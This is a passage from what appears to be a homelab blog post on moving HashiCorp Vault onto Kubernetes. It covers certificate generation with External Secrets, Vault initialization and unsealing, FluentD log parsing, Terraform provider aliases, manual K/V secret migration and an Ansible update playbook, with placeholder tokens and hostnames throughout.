<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>kubectl cluster-info
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>Kubernetes control plane is running at https://k8s.example.com:6443
</span></span><span style="display:flex;"><span>CoreDNS is running at https://k8s.example.com:6443/api/v1/namespaces/kube-system/services/kube-dns:dns/proxy
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>To further debug and diagnose cluster problems, use <span style="color:#e6db74">&#39;kubectl cluster-info dump&#39;</span>.
</span></span></code></pre></div><p>To get the <code>kubernetes_ca_cert</code>, you can have a look at the <code>kube-root-ca.crt</code>
ConfigMap that should be available in all namespaces, for example like this:</p>
<pre tabindex="0"><code>kubectl get -n kube-system configmaps kube-root-ca.crt -o jsonpath=&#34;{[&#39;data&#39;][&#39;ca\.crt&#39;]}&#34;
</code></pre><p>Finally, I&rsquo;ve also restricted all tokens created by the <code>vault-certs</code> role so
that they&rsquo;re only valid when coming from IPs in the Homelab. That&rsquo;s just a small
defense-in-depth measure I like to apply to any Vault tokens where it&rsquo;s possible.</p>
<h3 id="finally-setting-up-the-certificate-generator">Finally setting up the certificate generator</h3>
<p>With the authentication now configured properly, the certificate generation
can be set up like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">external-secrets.io/v1beta1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">ExternalSecret</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;vault-tls-certs&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">refreshInterval</span>: <span style="color:#e6db74">&#34;4000h&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">target</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">name</span>: <span style="color:#ae81ff">vault-tls-certs</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">dataFrom</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">sourceRef</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">generatorRef</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">generators.external-secrets.io/v1alpha1</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">kind</span>: <span style="color:#ae81ff">VaultDynamicSecret</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;vault-certs-generator&#34;</span>
</span></span><span style="display:flex;"><span>---
</span></span><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">generators.external-secrets.io/v1alpha1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">VaultDynamicSecret</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;vault-certs-generator&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">path</span>: <span style="color:#e6db74">&#34;my-ca/issue/vault-certs&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">method</span>: <span style="color:#e6db74">&#34;POST&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">parameters</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">common_name</span>: <span style="color:#e6db74">&#34;newvault.example.com&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">alt_names</span>: <span style="color:#e6db74">&#34;vault-0.vault-internal,vault-1.vault-internal,vault-2.vault-internal&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">ip_sans</span>: <span style="color:#e6db74">&#34;127.0.0.1&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">resultType</span>: <span style="color:#e6db74">&#34;Data&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">provider</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">server</span>: <span style="color:#e6db74">&#34;https://vault.example.com:8200&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">caProvider</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">type</span>: <span style="color:#ae81ff">Secret</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">name</span>: <span style="color:#ae81ff">homelab-ca-cert</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">namespace</span>: <span style="color:#ae81ff">vault</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">key</span>: <span style="color:#ae81ff">caCert</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">auth</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">kubernetes</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">mountPath</span>: <span style="color:#e6db74">&#34;kubernetes&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">role</span>: <span style="color:#e6db74">&#34;vault-certs&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">serviceAccountRef</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;vault&#34;</span>
</span></span></code></pre></div><p>With this configuration, the Vault certs are collected (still from the old
baremetal Vault), with the Kubernetes authentication using the <code>vault</code> ServiceAccount.
This now works without issue, and a certificate usable by the k8s Vault instance
is generated.</p>
<p>I&rsquo;m also setting the renewal time of the Secret containing the certificate to
4000 hours. This should lead to automatic renewal with quite some time to spare,
as the certificates are given a lifetime of 4400h.</p>
<p>One thing to note is that the VaultDynamicSecret also needs the CA certificate.
The way I&rsquo;m currently supplying that one is a bit hacky. I&rsquo;m deploying Vault
with a Helm chart, and I&rsquo;ve added this to the <code>values.yaml</code> file:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">caBundle</span>: |<span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">  {{- exec &#34;curl&#34; (list &#34;https://vault.example.com:8200/v1/my-ca/ca/pem&#34;) | nindent 2 }}</span>
</span></span></code></pre></div><p>This is a special functionality of the tool I&rsquo;ve been using to manage all of
the Helm charts in my cluster, <a href="https://github.com/helmfile/helmfile">Helmfile</a>.
It can interpret Go templates in the <code>values.yaml</code> file. That line fetches the
CA certificate from the Vault endpoint and stores it in the <code>caBundle</code> variable.
That is then used to create a Secret with the CA like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Secret</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">homelab-ca-cert</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">stringData</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">caCert</span>: |<span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    {{- .Values.caBundle | nindent 6 }}</span>
</span></span></code></pre></div><h2 id="initializing-vault">Initializing Vault</h2>
<p>With all those Yaks safely shaven, I could finally go forward with initializing
the Kubernetes Vault cluster.</p>
<p>I used this command:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>kubectl exec -n vault vault-0 -- vault operator init -key-shares<span style="color:#f92672">=</span><span style="color:#ae81ff">1</span> -key-threshold<span style="color:#f92672">=</span><span style="color:#ae81ff">1</span> &gt; vault-init.txt
</span></span></code></pre></div><p>This initialization failed with a certificate error:</p>
<pre tabindex="0"><code>Get &#34;https://127.0.0.1:8200/v1/sys/seal-status&#34;: tls: failed to verify certificate: x509: cannot validate certificate for 127.0.0.1 because it doesn&#39;t contain any IP SANs
</code></pre><p>Even for local connections, Vault needs a cert. And that&rsquo;s why I&rsquo;ve got the
<code>127.0.0.1</code> IP SAN in the certificate used by Vault.</p>
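<p>A quick way to check whether the issued certificate actually carries that IP SAN
is to decode it from the generated Secret, assuming the certificate ends up under
the <code>certificate</code> key, which is what Vault&rsquo;s PKI issue response calls it:</p>
<pre tabindex="0"><code>kubectl get secret -n vault vault-tls-certs -o jsonpath=&#39;{.data.certificate}&#39; \
  | base64 -d \
  | openssl x509 -noout -text \
  | grep -A1 &#39;Subject Alternative Name&#39;
</code></pre>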
<p>After I got that issue fixed, I finally successfully initialized the Vault
instance, resulting in this information:</p>
<pre tabindex="0"><code>Unseal Key 1: abcde123

Initial Root Token: hvs.foobar

Vault initialized with 1 key shares and a key threshold of 1. Please securely
distribute the key shares printed above. When the Vault is re-sealed,
restarted, or stopped, you must supply at least 1 of these keys to unseal it
before it can start servicing requests.

Vault does not store the generated root key. Without at least 1 keys to
reconstruct the root key, Vault will remain permanently sealed!

It is possible to generate new unseal keys, provided you have a quorum of
existing unseal keys shares. See &#34;vault operator rekey&#34; for more information.
</code></pre><p>In the initialization command, I told Vault that I only need one key share.
Normally, you would split the key into multiple shares so they can be distributed,
but that doesn&rsquo;t make any real sense for a small personal instance. If somebody
somehow gets one of the key shares, they would very likely be able to get the
others the same way.</p>
<p>It is very important to save the initial root token <code>hvs.foobar</code>. This is
needed for the initial configuration, until some policies and other auth
methods have been configured.</p>
<p>The next step was then to unseal all three Vault instances with these commands
and the unseal key output by the <code>vault init</code> command:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>kubectl exec -it -n vault vault-0 -- vault operator unseal
</span></span><span style="display:flex;"><span>kubectl exec -it -n vault vault-1 -- vault operator unseal
</span></span><span style="display:flex;"><span>kubectl exec -it -n vault vault-2 -- vault operator unseal
</span></span></code></pre></div><p>One interesting thing to note: All of the Vault Pods, as configured by the
Helm chart, run with the OnDelete update strategy. This has the effect that no
change to the configuration, including e.g. setting new environment variables,
takes effect on its own. The Pods always need to be deleted manually for a change
to be applied.</p>
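<p>In practice, rolling out a config change therefore looks something like this, one
Pod at a time, with each recreated Pod coming back sealed:</p>
<pre tabindex="0"><code># Delete the Pod so the StatefulSet recreates it with the new configuration.
kubectl delete pod -n vault vault-0
# The recreated Pod starts sealed, so it needs another unseal.
kubectl exec -it -n vault vault-0 -- vault operator unseal
</code></pre>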
<h2 id="configuring-vault-logging">Configuring Vault logging</h2>
<p>I like having my logs all in at least approximately the same format, and so
I&rsquo;ve got a log parsing section for most apps in my FluentD config. Normally I
don&rsquo;t mention this, but Vault is a little bit weird. Namely, it does output
its logs as JSON if so configured, which is good. It makes parsing a lot simpler.
But, it also adds an <code>@</code> symbol to the names of <em>most</em> of the JSON keys:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-json" data-lang="json"><span style="display:flex;"><span>{<span style="color:#f92672">&#34;@level&#34;</span>:<span style="color:#e6db74">&#34;info&#34;</span>,<span style="color:#f92672">&#34;@message&#34;</span>:<span style="color:#e6db74">&#34;compacting logs&#34;</span>,<span style="color:#f92672">&#34;@module&#34;</span>:<span style="color:#e6db74">&#34;storage.raft&#34;</span>,<span style="color:#f92672">&#34;@timestamp&#34;</span>:<span style="color:#e6db74">&#34;2025-04-06T18:11:31.197956Z&#34;</span>,<span style="color:#f92672">&#34;from&#34;</span>:<span style="color:#ae81ff">893122</span>,<span style="color:#f92672">&#34;to&#34;</span>:<span style="color:#ae81ff">901345</span>}
</span></span><span style="display:flex;"><span>{<span style="color:#f92672">&#34;@level&#34;</span>:<span style="color:#e6db74">&#34;info&#34;</span>,<span style="color:#f92672">&#34;@message&#34;</span>:<span style="color:#e6db74">&#34;snapshot complete up to&#34;</span>,<span style="color:#f92672">&#34;@module&#34;</span>:<span style="color:#e6db74">&#34;storage.raft&#34;</span>,<span style="color:#f92672">&#34;@timestamp&#34;</span>:<span style="color:#e6db74">&#34;2025-04-06T18:11:31.235460Z&#34;</span>,<span style="color:#f92672">&#34;index&#34;</span>:<span style="color:#ae81ff">911585</span>}
</span></span></code></pre></div><p>And I&rsquo;ve got no idea why. Or how it decides which keys get the <code>@</code> and which
do not. It made my log parsing a little bit more complicated. It now looks
like this:</p>
<pre tabindex="0"><code># Log config for the Vault deployment
&lt;filter services.vault.vault&gt;
  @type parser
  key_name log
  reserve_data true
  remove_key_name_field true
  &lt;parse&gt;
    @type multi_format
    &lt;pattern&gt;
      format json
      time_key &#34;@timestamp&#34;
      time_type string
      time_format %iso8601
      utc true
    &lt;/pattern&gt;
    &lt;pattern&gt;
      format regexp
      expression /^(?&lt;msg&gt;.*)$/
      time_key nil
    &lt;/pattern&gt;
  &lt;/parse&gt;
&lt;/filter&gt;

&lt;filter services.vault.vault&gt;
  @type record_modifier
  remove_keys _dummy_,@level
  &lt;record&gt;
    _dummy_ ${record[&#34;level&#34;] = record[&#34;@level&#34;] if record.key?(&#34;@level&#34;)}
  &lt;/record&gt;
&lt;/filter&gt;
</code></pre><p>The first filter does the main parsing, while the second one renames the
<code>@level</code> key to plain <code>level</code> (copying the value and removing the old key), because
that&rsquo;s the key where my setup expects to see the log level.</p>
<p>Another weird thing, where Vault is by far not the biggest offender, is apps
which log in multiple different formats. That&rsquo;s why the first filter has a
<code>multi_format</code> parser. For reasons I&rsquo;m not sure about, Vault outputs some general
information at the beginning of the log, during startup, where it doesn&rsquo;t respect
the log format configuration:</p>
<pre tabindex="0"><code>==&gt; Vault server configuration:

Administrative Namespace:
             Api Address: https://10.8.1.61:8200
                     Cgo: disabled
         Cluster Address: https://vault-0.vault-internal:8201
   Environment Variables: HOME, HOSTNAME, HOST_IP, KUBERNETES_PORT, KUBERNETES_PORT_443_TCP, KUBERNETES_PORT_443_TCP_ADDR, KUBERNETES_PORT_443_TCP_PORT, KUBERNETES_PORT_443_TCP_PROTO, KUBERNETES_SERVICE_HOST, KUBERNETES_SERVICE_PORT, KUBERNETES_SERVICE_PORT_HTTPS, NAME, PATH, POD_IP, PWD, SHLVL, SKIP_CHOWN, SKIP_SETCAP, TERM, VAULT_ADDR, VAULT_API_ADDR, VAULT_CACERT, VAULT_CLUSTER_ADDR, VAULT_K8S_NAMESPACE, VAULT_K8S_POD_NAME, VAULT_LOG_FORMAT, VAULT_LOG_LEVEL, VAULT_PORT, VAULT_PORT_8200_TCP, VAULT_PORT_8200_TCP_ADDR, VAULT_PORT_8200_TCP_PORT, VAULT_PORT_8200_TCP_PROTO, VAULT_PORT_8201_TCP, VAULT_PORT_8201_TCP_ADDR, VAULT_PORT_8201_TCP_PORT, VAULT_PORT_8201_TCP_PROTO, VAULT_RAFT_NODE_ID, VAULT_SERVICE_HOST, VAULT_SERVICE_PORT, VAULT_SERVICE_PORT_HTTPS, VAULT_SERVICE_PORT_HTTPS_INTERNAL, VERSION
              Go Version: go1.23.6
              Listener 1: tcp (addr: &#34;[::]:8200&#34;, cluster address: &#34;[::]:8201&#34;, disable_request_limiter: &#34;false&#34;, max_request_duration: &#34;1m30s&#34;, max_request_size: &#34;33554432&#34;, tls: &#34;enabled&#34;)
               Log Level: debug
                   Mlock: supported: true, enabled: false
           Recovery Mode: false
                 Storage: raft (HA available)
                 Version: Vault v1.18.5, built 2025-02-24T09:40:28Z
             Version Sha: 2cb3755273dbd63f5b0f8ec50089b57ffd3fa330

==&gt; Vault server started! Log data will stream in below:
</code></pre><p>Why output that in plain text, instead of also putting it into JSON? It seems to
be a quirk of all of HashiCorp&rsquo;s tools; Nomad and Consul do the same thing,
if I remember correctly.</p>
<h2 id="migrating-to-the-new-vault-instance">Migrating to the new Vault instance</h2>
<p>With the instance on Kubernetes now configured, I needed to migrate the data to
that instance. Sadly, there&rsquo;s no really good way to migrate K/V store entries in
particular from one Vault to another. So I just went with manual migration.</p>
<h3 id="running-terraform-against-the-new-instance">Running Terraform against the new instance</h3>
<p>As I&rsquo;ve mentioned before, I&rsquo;m using Terraform for a lot of the configuration for
Vault, because that is preferable to keeping a list of commands in my
docs.</p>
<p>But the issue was: I also had to keep the configuration for the old Vault
instance, because that one needed to stay running during the migration as well.</p>
<p>So I started out with just adding the second Vault as another provider to my
Terraform config, via <a href="https://developer.hashicorp.com/terraform/language/providers/configuration#alias-multiple-provider-configurations">provider aliases</a>.
It looked like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-hcl" data-lang="hcl"><span style="display:flex;"><span><span style="color:#66d9ef">provider</span> <span style="color:#e6db74">&#34;vault&#34;</span> {
</span></span><span style="display:flex;"><span>  address <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;https://vault.example.com:8200&#34;</span>
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">provider</span> <span style="color:#e6db74">&#34;vault&#34;</span> {
</span></span><span style="display:flex;"><span>  alias <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;k8s&#34;</span>
</span></span><span style="display:flex;"><span>  address <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;https://newvault.example.com:8200&#34;</span>
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>This allows me to keep configurations for two Vault instances in the same Terraform
state. I initially only created the <code>userpass</code> auth method for the new Vault,
to verify that the Terraform setup worked:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-hcl" data-lang="hcl"><span style="display:flex;"><span><span style="color:#66d9ef">resource</span> <span style="color:#e6db74">&#34;vault_auth_backend&#34; &#34;userpass&#34;</span> {
</span></span><span style="display:flex;"><span>  type <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;userpass&#34;</span>
</span></span><span style="display:flex;"><span>  path <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;userpass&#34;</span>
</span></span><span style="display:flex;"><span>  local <span style="color:#f92672">=</span> <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">resource</span> <span style="color:#e6db74">&#34;vault_auth_backend&#34; &#34;userpass-k8s&#34;</span> {
</span></span><span style="display:flex;"><span>  provider <span style="color:#f92672">=</span> <span style="color:#66d9ef">vault</span>.<span style="color:#66d9ef">k8s</span>
</span></span><span style="display:flex;"><span>  type <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;userpass&#34;</span>
</span></span><span style="display:flex;"><span>  path <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;userpass&#34;</span>
</span></span><span style="display:flex;"><span>  local <span style="color:#f92672">=</span> <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>With the <code>provider</code> setting, I could choose which Vault provider config I wanted
to use.</p>
<p>But trying a <code>terraform apply</code> with this configuration resulted in an error:</p>
<pre tabindex="0"><code>│ Error: failed to lookup token, err=Error making API request.
│
│ URL: GET https://vault.example.com:8200/v1/auth/token/lookup-self
│ Code: 403. Errors:
│
│ * 2 errors occurred:
│       * permission denied
│       * invalid token
</code></pre><p>This confused me, until I remembered that I had exported the root token
for the new k8s Vault in the terminal where I was running the command. Running my
customary <code>vault login -method=userpass username=myuser</code> in another shell and
executing the <code>terraform apply</code> there of course also didn&rsquo;t work, because now it
had only the Vault token needed for the old Vault instance.</p>
<p>A quick look into the <a href="https://registry.terraform.io/providers/hashicorp/vault/latest/docs#vault-authentication-configuration-options">Vault Terraform provider documentation</a>
led to the solution. I could configure one provider <a href="https://registry.terraform.io/providers/hashicorp/vault/latest/docs#token-file">with a filepath</a>
to a token file. That would be the provider for the old Vault instance. Then
I would leave the provider for the new Vault unconfigured, which would mean that
it would continue to use the <code>VAULT_TOKEN</code> environment variable. The resulting
provider config looked like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-hcl" data-lang="hcl"><span style="display:flex;"><span><span style="color:#66d9ef">provider</span> <span style="color:#e6db74">&#34;vault&#34;</span> {
</span></span><span style="display:flex;"><span>  address <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;https://vault.example.com:8200&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">auth_login_token_file</span> {
</span></span><span style="display:flex;"><span>    filename <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;/home/myuser/.vault-token&#34;</span>
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">provider</span> <span style="color:#e6db74">&#34;vault&#34;</span> {
</span></span><span style="display:flex;"><span>  alias <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;k8s&#34;</span>
</span></span><span style="display:flex;"><span>  address <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;https://newvault.example.com:8200&#34;</span>
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>I would then first run the login for the old provider:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>vault login -method<span style="color:#f92672">=</span>userpass username<span style="color:#f92672">=</span>myuser
</span></span></code></pre></div><p>Then, in the same terminal, I would set the <code>VAULT_TOKEN</code> variable to the root
token of the new Vault:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>export VAULT_TOKEN<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;hvs.foobar&#34;</span>
</span></span></code></pre></div><p>And with that, I was able to run <code>terraform apply</code> without issue, and both
Vault instances were configurable.</p>
<p>Next, I needed to stop using the root token for the new instance and
instead create a <code>userpass</code> login for that one as well. This I had to do on
the command line, because the <a href="https://registry.terraform.io/providers/hashicorp/vault/latest/docs/resources/generic_endpoint">Terraform resource</a>
that would be used to create a <code>userpass</code> user requires the password as part
of the resource definition, and hence the Terraform state, and I really did not
want that. So I created the user manually:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>vault write auth/userpass/users/myuser password<span style="color:#f92672">=</span>- token_policies<span style="color:#f92672">=</span>admin token_ttl<span style="color:#f92672">=</span>4h token_max_ttl<span style="color:#f92672">=</span>4h token_bound_cidrs<span style="color:#f92672">=</span>300.300.300.12 token_type<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;default&#34;</span>
</span></span></code></pre></div><p>This will create the user <code>myuser</code> in the <code>userpass</code> backend and will ask for
the password on the command line. Tokens issued by this auth method for the user
will be valid for four hours and will only be valid when used from the <code>300.300.300.12</code>
source IP, which is my Command &amp; Control host.</p>
<p>Now, instead of exporting the root token in the <code>VAULT_TOKEN</code> variable, I could
issue this command to get a token for the <code>myuser</code> user:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>export VAULT_TOKEN<span style="color:#f92672">=</span><span style="color:#66d9ef">$(</span>vault login -method<span style="color:#f92672">=</span>userpass -token-only username<span style="color:#f92672">=</span>myuser<span style="color:#66d9ef">)</span>
</span></span></code></pre></div><h2 id="migrating-kv-secrets">Migrating K/V secrets</h2>
<p>After I had the <code>userpass</code> login configured, I could just copy+paste all of the
Terraform resources for my Vault setup, add the <code>provider = vault.k8s</code> option,
and one <code>terraform apply</code> later, most configuration was migrated to the new
Vault instance on Kubernetes.</p>
<p>The only problem was the K/V secrets. Those are not in Terraform, because that
would have required me to put my secrets into the Terraform config files and the
Terraform state. After searching around a little, it looked like there was no
official way to run a migration of K/V secrets, so I came up with my own.</p>
<p>First, I would export the <code>data</code> field, which contains the actual secrets
rather than the metadata, from the old Vault:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>vault kv get -field data -format json secret/topsecret/database-creds &gt; out.json
</span></span></code></pre></div><p>That would give me a JSON file like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-json" data-lang="json"><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">&#34;username&#34;</span>: <span style="color:#e6db74">&#34;foo&#34;</span>,
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">&#34;password&#34;</span>: <span style="color:#e6db74">&#34;bar&#34;</span>
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>That could then be imported into the new Vault like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>vault kv put secret/topsecret/database-creds @out.json
</span></span></code></pre></div><p>I did that exactly 59 times, and all of my secrets were successfully migrated
over.</p>
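<p>If I ever have to do this again, I will probably script the loop. A minimal sketch
for a single, non-nested K/V path, assuming <code>jq</code> is available and using made-up
<code>VAULT_NEW_ADDR</code>/<code>VAULT_NEW_TOKEN</code> variables for the new instance:</p>
<pre tabindex="0"><code># Copy every secret directly under secret/topsecret/ from the old Vault
# (VAULT_ADDR/VAULT_TOKEN) to the new one (VAULT_NEW_ADDR/VAULT_NEW_TOKEN).
for name in $(vault kv list -format=json secret/topsecret | jq -r &#39;.[]&#39;); do
  vault kv get -field data -format json &#34;secret/topsecret/${name}&#34; &gt; out.json
  VAULT_ADDR=&#34;$VAULT_NEW_ADDR&#34; VAULT_TOKEN=&#34;$VAULT_NEW_TOKEN&#34; \
    vault kv put &#34;secret/topsecret/${name}&#34; @out.json
done
</code></pre>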
<h2 id="update-playbook-changes">Update playbook changes</h2>
<p>Another interesting piece of code I would like to talk about is my Homelab host
update Ansible playbook. This playbook runs updates of the host OS, Ubuntu
server in my case, including automatic reboots and k8s node drains. But I would
need to manually unseal the Vault Pods once their host was updated and rebooted.
For that, I simply have an Ansible task output the command I can copy+paste
into another terminal to do the unseal.</p>
<p>This was pretty simple up to now, with the baremetal Vault: I could
directly contact the host being updated, as the Vault instance running on it
would be the one which needs the unseal.
But with Vault in k8s, there&rsquo;s no obvious way to determine which of the three
Vault Pods runs on the host currently being updated. I needed an approach to
find the right Pod.</p>
<p>The first step is to wait for the local Vault Pod on the rebooted machine to
come up again, so that it would even accept the unseal command. I did that
with the following task:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">wait for vault to be running</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">kubernetes</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">delegate_to</span>: <span style="color:#ae81ff">candchost</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">become_user</span>: <span style="color:#ae81ff">candcuser</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">kubernetes.core.k8s_info</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Pod</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">namespace</span>: <span style="color:#ae81ff">vault</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">label_selectors</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">app.kubernetes.io/name=vault</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">app.kubernetes.io/instance=vault</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">field_selectors</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#e6db74">&#34;spec.nodeName={{ ansible_hostname }}&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">wait</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">wait_condition</span>:
